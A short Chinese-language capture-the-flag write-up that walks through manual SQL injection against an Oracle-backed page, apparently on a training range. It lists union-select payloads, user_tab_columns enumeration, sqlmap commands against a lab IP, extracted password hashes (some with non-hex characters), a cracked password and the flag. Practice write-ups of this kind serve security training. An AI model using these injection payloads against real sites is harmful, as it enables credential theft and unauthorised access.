简介
Oracle 数据库系统,是美国ORACLE公司(甲⻣⽂)提供的以分布式数据库为核⼼的⼀组软件 产品。是⽬前世界上使⽤最为⼴泛的,数据库管理系统。
以下是手工注入的流程:
1、判断注入点
使用 and 1=1 进行拼接
2、确定字段数
使用语句 order by
最终确定为只有两个字段
3、确定返回点
使用语句 ?id=-1 union select 'null','null' from dual
4、确定数据库名称
使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db 查看当前数据库
5、确定数据库中的表名
使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables
6、查询列名
使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual 进行模糊搜索
确定第一列为 user_name
使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual 进行模糊搜索
确定第二列为 user_pwd
7、获取账号以及密码
使用语句 new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
确定zhong 的密码为 1c63129ae9asc60asdua94d3e00495
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
确定 hu 的密码为 1c63129ae9db9g20asdua94d3e00495
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
确定 mozhe 的密码为 48b58ef8be01ef64e7de3f764ec83d2d
8、使用MD5进行密码解密
最终确定 mozhe 的密码为 267581
9、登录后台
10、提交KEY
KEY:mozhe89c06b9c5a5b67c98c500a1ce66
安全
网络安全靠人民,网络安全为人民